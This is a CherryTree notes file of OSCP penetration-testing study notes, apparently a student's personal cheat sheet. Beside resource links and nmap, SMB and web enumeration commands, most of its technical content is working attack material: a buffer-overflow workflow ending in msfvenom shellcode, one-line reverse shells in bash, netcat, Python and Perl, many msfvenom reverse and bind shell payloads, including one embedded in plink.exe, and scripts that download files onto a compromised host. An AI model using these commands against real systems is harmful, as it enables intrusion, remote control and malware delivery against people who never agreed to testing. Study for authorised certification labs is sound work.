<?xml version="1.0" ?>
<cherrytree>
<node custom_icon_id="0" foreground="" is_bold="False" name="General" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569178799.39" ts_lastsave="1572362312.97" unique_id="1">
<rich_text>• Exploit interpreter fix: </rich_text>
<rich_text link="webs https://askubuntu.com/questions/304999/not-able-to-execute-a-sh-file-bin-bashm-bad-interpreter">https://askubuntu.com/questions/304999/not-able-to-execute-a-sh-file-bin-bashm-bad-interpreter</rich_text>
<rich_text>
• Oscp repo: </rich_text>
<rich_text link="webs https://github.com/rewardone/OSCPRepo">https://github.com/rewardone/OSCPRepo</rich_text>
<rich_text>
• Pentest compilation: </rich_text>
<rich_text link="webs https://github.com/adon90/pentest_compilation">https://github.com/adon90/pentest_compilation</rich_text>
<rich_text>
• Command Templates: </rich_text>
<rich_text link="webs https://pentest.ws">https://pentest.ws</rich_text>
<rich_text>
• Password Lists: </rich_text>
<rich_text link="webs https://github.com/danielmiessler/SecLists">https://github.com/danielmiessler/SecLists</rich_text>
<rich_text>
• Automated OSCP reconnaissance tool: </rich_text>
<rich_text link="webs https://github.com/codingo/Reconnoitre">https://github.com/codingo/Reconnoitre</rich_text>
<rich_text>
• OSCP Report Template: </rich_text>
<rich_text link="webs https://github.com/whoisflynn/OSCP-Exam-Report-Template">https://github.com/whoisflynn/OSCP-Exam-Report-Template</rich_text>
<rich_text>
• OSCP Scripts: </rich_text>
<rich_text link="webs https://github.com/ihack4falafel/OSCP">https://github.com/ihack4falafel/OSCP</rich_text>
<rich_text>
• Pentesting resource: </rich_text>
<rich_text link="webs https://guif.re/">https://guif.re/</rich_text>
<rich_text>
• FTP Binary mode: </rich_text>
<rich_text link="webs https://www.jscape.com/blog/ftp-binary-and-ascii-transfer-types-and-the-case-of-corrupt-files">https://www.jscape.com/blog/ftp-binary-and-ascii-transfer-types-and-the-case-of-corrupt-files</rich_text>
<rich_text>
• Pentesting Cheatsheet: </rich_text>
<rich_text link="webs https://ired.team/">https://ired.team/</rich_text>
<node custom_icon_id="0" foreground="" is_bold="False" name="Proof" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569753850.79" ts_lastsave="1572353752.83" unique_id="7">
<rich_text>•</rich_text>
<rich_text weight="heavy"> Linux Proof:</rich_text>
<rich_text> cat proof.txt && hostname && id && whoami && (/sbin/ifconfig || ip addr)  # ip addr fallback: newer distros ship without net-tools, so ifconfig may be missing
• </rich_text>
<rich_text weight="heavy">Windows Proof:</rich_text>
<rich_text> hostname && whoami.exe && whoami.exe /groups && type proof.txt && ipconfig /all</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="OSCP Guides" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572356602.53" ts_lastsave="1572356702.94" unique_id="11">
<rich_text>•</rich_text>
<rich_text weight="heavy"> A Detailed Guide on OSCP Preparation – From Newbie to OSCP:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/">https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Passing OSCP</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html">https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">OSCP Journey exam</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://h4ck.co/oscp-journey-exam-lab-prep-tips/">https://h4ck.co/oscp-journey-exam-lab-prep-tips/</rich_text>
<rich_text>
•</rich_text>
<rich_text weight="heavy"> OSCP Review</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://hackmethod.com/oscp-review-tips/">https://hackmethod.com/oscp-review-tips/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Pentesting Prep for OSCP:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/moshekaplan/pentesting_notes/blob/master/OSCP_prep.md">https://github.com/moshekaplan/pentesting_notes/blob/master/OSCP_prep.md</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Commands" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572362312.97" ts_lastsave="1572614020.8" unique_id="12">
<rich_text>• Nmap All TCP Ports: nmap -p 1-65535 -T4 -A -v -Pn -oA fullportscan 10.10.10.10
• Nmap Intense Scan: nmap -T4 -A -v -Pn -oA Intensescan 10.10.10.10
• Quick UDP Scan: nmap -sU -sV -vv -oA quick_udp 10.10.10.10 (with no port list this scans nmap's default 1000 UDP ports and is slow; add --top-ports 100 for a genuinely quick first pass)
• Port knock: for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.10.10.10; done
• Netcat banner grab: nc -v 10.10.10.10 port
• Telnet banner grab: telnet 10.10.10.10 port
• Dirsearch: cd ~/OSCP/Tools/dirsearch/ && ./dirsearch.py -u </rich_text>
<rich_text link="webs http://google.com">http://google.com</rich_text>
<rich_text> -e /
• Gobuster: gobuster dir -u </rich_text>
<rich_text link="webs https://google.com">https://google.com</rich_text>
<rich_text> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
◇ Gobuster quick directory busting: gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
◇ Gobuster comprehensive directory busting: gobuster dir -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
◇ Gobuster search with file extension: gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
◇ Note: gobuster 3.x needs the dir subcommand shown above (the pre-3.0 syntax without it errors out). Newer 3.x releases also refuse -s together with the default -b 404 status blacklist, so add -b '' when using -s. In current SecLists the wordlist directory is spelled Web-Content (hyphen), so adjust the path if the underscore form is not found.
• SMB Scans:
☐ smbmap IP
☐ SMB vulnerability scan: nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10 (caution: several of these scripts are in nmap's intrusive/dos categories and can crash an unpatched target's SMB service or the host itself; smb-vuln-ms10-054 only performs its real check with --script-args unsafe=1. Read each script's NSEdoc and the engagement rules before running them all at once)
☐ SMB Users & Shares Scan: nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
☐ Enum4linux: enum4linux -a 10.10.10.10
☐ Null connect: rpcclient -U "" -N 10.10.10.10 (-N skips the password prompt so the null-session attempt is non-interactive)
☐ Connect to SMB share: smbclient -N //10.10.10.10/share (list shares first with: smbclient -N -L //10.10.10.10)
• SNMP enumeration: snmp-check 10.10.10.10
• Web Scans:
nikto -h http://10.10.10.10
wpscan --url http://10.10.10.10 (wpscan 3.x takes --url; the bare -u short flag is the older 2.x syntax)
• </rich_text>
<rich_text weight="heavy">Easy Web Server:</rich_text>
<rich_text> python -m SimpleHTTPServer 80 (Python 2 only; on Python 3 use: python3 -m http.server 80. Either one serves the whole current directory to anyone who can reach the port, so start it in a dedicated directory and stop it when done)
• </rich_text>
<rich_text weight="heavy">Easy FTP server</rich_text>
<rich_text>: python -m pyftpdlib -p 21 -w (-w grants anonymous write access to the served directory, so serve a throwaway directory and stop the server when finished; binding port 21 needs root)
• Non-interactive execute </rich_text>
<rich_text weight="heavy">powershell</rich_text>
<rich_text> file: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1</rich_text>
</node>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Buffer Overflow" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572356166.41" ts_lastsave="1572363094.57" unique_id="10">
<rich_text>• </rich_text>
<rich_text weight="heavy">Buffer Overflow video</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://www.youtube.com/watch?v=OOkU7to0Ty4">https://www.youtube.com/watch?v=OOkU7to0Ty4</rich_text>
<node custom_icon_id="0" foreground="" is_bold="False" name="Commands" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572363010.91" ts_lastsave="1572363014.33" unique_id="15">
<rich_text>#Create a pattern depending on the buffer size that crashes the application
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
#Find the exact buffer size that crashes the application by supplying the EIP contents after the crash with the supplied pattern
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
#We test the bad characters by supplying all the hex characters with our exploit
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
#Run the following in the Immunity Debugger command bar (the white input field at the bottom of the window) to list loaded modules and their protections
!mona modules
#Run this script to find the hex equivalent of jmp esp
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
#Run the following in Immunity; replace slmfc.dll with a module from the !mona modules output whose protections (ASLR, Rebase, SafeSEH, NX) are all False and whose address range contains none of the bad characters found above
!mona find -s "\xff\xe4" -m slmfc.dll
#We generate our shellcode (-e takes a plain ASCII hyphen; keep the -b list in sync with the bad characters identified above - \x00\x0a\x0d is only the common default)
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.167 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"</rich_text>
</node>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Offensive Security Links" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572340238.17" ts_lastsave="1572340772.27" unique_id="9">
<rich_text>• OSCP Certification Exam Guide: </rich_text>
<rich_text link="webs https://support.offensive-security.com/oscp-exam-guide/">https://support.offensive-security.com/oscp-exam-guide/</rich_text>
<rich_text>
• Proctored Exam Guide: </rich_text>
<rich_text link="webs https://www.offensive-security.com/faq/#proc-1">https://www.offensive-security.com/faq/#proc-1</rich_text>
<rich_text>
◇ </rich_text>
<rich_text link="webs https://support.offensive-security.com/proctoring-faq/">https://support.offensive-security.com/proctoring-faq/</rich_text>
<rich_text>
• OSCP Exam FAQ: </rich_text>
<rich_text link="webs https://forums.offensive-security.com/showthread.php?2191-FAQ-Questions-about-the-OSCP-Exam">https://forums.offensive-security.com/showthread.php?2191-FAQ-Questions-about-the-OSCP-Exam</rich_text>
<rich_text>
• Common Technical Issues: </rich_text>
<rich_text link="webs https://forums.offensive-security.com/showthread.php?2190-Common-Technical-Issues">https://forums.offensive-security.com/showthread.php?2190-Common-Technical-Issues</rich_text>
<rich_text>
• General Questions: </rich_text>
<rich_text link="webs https://forums.offensive-security.com/showthread.php?2189-General-questions-about-the-PWK-course">https://forums.offensive-security.com/showthread.php?2189-General-questions-about-the-PWK-course</rich_text>
<rich_text>
• Network Introduction Guide: </rich_text>
<rich_text link="webs https://support.offensive-security.com/pwk-network-intro-guide/">https://support.offensive-security.com/pwk-network-intro-guide/</rich_text>
<rich_text>
</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Web" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569786369.67" ts_lastsave="1572356239.73" unique_id="8">
<rich_text>• </rich_text>
<rich_text weight="heavy">LFI/RFI:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#basic-rfi">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#basic-rfi</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">MSSQL Injection:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://www.exploit-db.com/papers/12975">https://www.exploit-db.com/papers/12975</rich_text>
<rich_text>
◇ MSSQL Union Based Injection: </rich_text>
<rich_text link="webs http://www.securityidiots.com/Web-Pentest/SQL-Injection/MSSQL/MSSQL-Union-Based-Injection.html">http://www.securityidiots.com/Web-Pentest/SQL-Injection/MSSQL/MSSQL-Union-Based-Injection.html</rich_text>
<rich_text>
◇ MSSQL SQL Injection Cheat Sheet: </rich_text>
<rich_text link="webs http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet">http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet</rich_text>
<rich_text>
•</rich_text>
<rich_text weight="heavy"> MySQL Injection:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet">http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">MongoDB Nosql Injection:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://security.stackexchange.com/questions/83231/mongodb-nosql-injection-in-python-code">https://security.stackexchange.com/questions/83231/mongodb-nosql-injection-in-python-code</rich_text>
<rich_text>
</rich_text>
<rich_text link="webs http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet">http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Enumeration" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569179105.17" ts_lastsave="1572467773.87" unique_id="2">
<rich_text>• </rich_text>
<rich_text weight="heavy">General Enumeration - Common port checks:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs http://www.0daysecurity.com/penetration-testing/enumeration.html">http://www.0daysecurity.com/penetration-testing/enumeration.html</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Nmap Scripts:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://nmap.org/nsedoc/">https://nmap.org/nsedoc/</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Shell Exploitation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569179180.75" ts_lastsave="1572613669.18" unique_id="3">
<rich_text>•</rich_text>
<rich_text weight="heavy"> Reverse Shell</rich_text>
<rich_text> Cheat Sheet: </rich_text>
<rich_text link="webs http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</rich_text>
<rich_text>
◇ More Reverse Shells: </rich_text>
<rich_text link="webs https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/">https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/</rich_text>
<rich_text>
◇ Even More Reverse shells: </rich_text>
<rich_text link="webs https://delta.navisec.io/reverse-shell-reference/">https://delta.navisec.io/reverse-shell-reference/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Spawning TTY Shell:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://netsec.ws/?p=337">https://netsec.ws/?p=337</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Metasploit payloads (msfvenom):</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://netsec.ws/?p=331">https://netsec.ws/?p=331</rich_text>
<rich_text>
•</rich_text>
<rich_text weight="heavy"> Best Web Shells</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://www.1337pwn.com/best-php-web-shells/">https://www.1337pwn.com/best-php-web-shells/</rich_text>
<rich_text>
◇ </rich_text>
<rich_text link="webs https://github.com/artyuum/Simple-PHP-Web-Shell">https://github.com/artyuum/Simple-PHP-Web-Shell</rich_text>
<rich_text>
◇ </rich_text>
<rich_text link="webs http://www.topshellv.com/">http://www.topshellv.com/</rich_text>
<rich_text>
•</rich_text>
<rich_text weight="heavy"> Escape from SHELLcatraz</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=10">https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=10</rich_text>
<rich_text>
</rich_text>
<node custom_icon_id="0" foreground="" is_bold="False" name="Reverse Shells" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572362853.62" ts_lastsave="1572613373.5" unique_id="13">
<rich_text>• bash -i >& /dev/tcp/10.10.10.10/4443 0>&1
• rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
• nc -e /bin/sh 10.10.10.10 4443 (needs a netcat built with -e, e.g. netcat-traditional or ncat; the OpenBSD nc on many distros lacks it, so fall back to the mkfifo variant above)
• nc -e cmd.exe 10.10.10.10 4443 (Windows nc.exe)
• python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
• perl -e 'use Socket;$i="10.10.10.10";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Spawn TTY Shells" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613544.53" ts_lastsave="1572613599.18" unique_id="22">
<rich_text>• python -c 'import pty; pty.spawn("/bin/sh")'
• echo os.system('/bin/bash')
• /bin/sh -i
• perl -e 'exec "/bin/sh";'
• perl: exec "/bin/sh";
• ruby: exec "/bin/sh"
• lua: os.execute('/bin/sh')
• (From within IRB): exec "/bin/sh"
• (From within vi): :!bash
• (From within vi): :set shell=/bin/bash:shell
• (From within nmap --interactive): !sh (legacy interactive mode, present only in old nmap builds, roughly 2.02 to 5.21; useful when such a nmap is SUID)</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="msfvenom payloads" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572362943.32" ts_lastsave="1572362944.62" unique_id="14">
<rich_text># PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
# Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
# Linux bind shell (a bind shell listens on the target with no authentication - anyone who can reach the port gets the shell, so prefer a reverse shell when egress allows)
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
# FreeBSD x64 reverse shell (bsd/* payloads target FreeBSD, not Linux)
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf
# Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c
# Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
# Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
# Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py
# Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
# Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18
# Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
# Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai
# Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe
# Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="File Transfers" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613669.18" ts_lastsave="1572613749.56" unique_id="23">
<rich_text></rich_text>
<node custom_icon_id="0" foreground="" is_bold="False" name="HTTP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613677.82" ts_lastsave="1572613682.87" unique_id="24">
<rich_text># In Kali (SimpleHTTPServer is Python 2 only; on Python 3 use: python3 -m http.server 80)
python -m SimpleHTTPServer 80
# In reverse shell - Linux
wget 10.10.10.10/file
# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="FTP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613691.78" ts_lastsave="1572613696.54" unique_id="25">
<rich_text># In Kali (-w allows anonymous write, so serve a throwaway directory and stop the server when done)
python -m pyftpdlib -p 21 -w
# In reverse shell
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt
# Execute
ftp -v -n -s:ftp.txt
Name the file 'file' on your Kali machine so you don't have to rewrite the script for each file name; rename it on the Windows side after the transfer. Keep the "bin" line: without binary mode an ASCII-mode transfer corrupts executables (see the FTP Binary mode link under General).</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="TFTP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613730.76" ts_lastsave="1572613736.09" unique_id="26">
<rich_text># In Kali
atftpd --daemon --port 69 /tftp
# In reverse shell
tftp -i 10.10.10.10 GET nc.exe</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="VBS" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613749.56" ts_lastsave="1572613772.58" unique_id="27">
<rich_text>If FTP/TFTP fails you, this wget script in VBS is the go-to on Windows machines: it only needs cscript.exe and the WinHTTP/MSXML COM objects, so it works where PowerShell is unavailable or blocked. Arguments are the URL first, then the destination file.
# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe</rich_text>
</node>
</node>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Privilege Escalation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569179376.52" ts_lastsave="1572356018.41" unique_id="4">
<rich_text>Common privilege escalation exploits and scripts: </rich_text>
<rich_text link="webs https://github.com/AusJock/Privilege-Escalation">https://github.com/AusJock/Privilege-Escalation</rich_text>
<rich_text>
</rich_text>
<node custom_icon_id="0" foreground="" is_bold="False" name="Linux" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569179386.29" ts_lastsave="1572356447.65" unique_id="5">
<rich_text>• </rich_text>
<rich_text weight="heavy">Linux EoP (Best privesc):</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://guif.re/linuxeop">https://guif.re/linuxeop</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Basic Linux Privilege Escalation</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">unix-privesc-check</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs http://pentestmonkey.net/tools/audit/unix-privesc-check">http://pentestmonkey.net/tools/audit/unix-privesc-check</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">linuxprivchecker.py:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs http://www.securitysift.com/download/linuxprivchecker.py">http://www.securitysift.com/download/linuxprivchecker.py</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Linux Enumeration:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/rebootuser/LinEnum">https://github.com/rebootuser/LinEnum</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">pspy:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/DominicBreuker/pspy">https://github.com/DominicBreuker/pspy</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Linux Priv Checker:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/sleventyeleven/linuxprivchecker">https://github.com/sleventyeleven/linuxprivchecker</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Kernel Exploits</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://github.com/lucyoa/kernel-exploits">https://github.com/lucyoa/kernel-exploits</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">PrivEsc binaries:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://gtfobins.github.io/">https://gtfobins.github.io/</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Windows" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569179638.15" ts_lastsave="1572356540.62" unique_id="6">
<rich_text>• </rich_text>
<rich_text weight="heavy">Windows Privilege Escalation Fundamentals:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs http://www.fuzzysecurity.com/tutorials/16.html">http://www.fuzzysecurity.com/tutorials/16.html</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Windows-Exploit-Suggester:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/GDSSecurity/Windows-Exploit-Suggester">https://github.com/GDSSecurity/Windows-Exploit-Suggester</rich_text>
<rich_text>
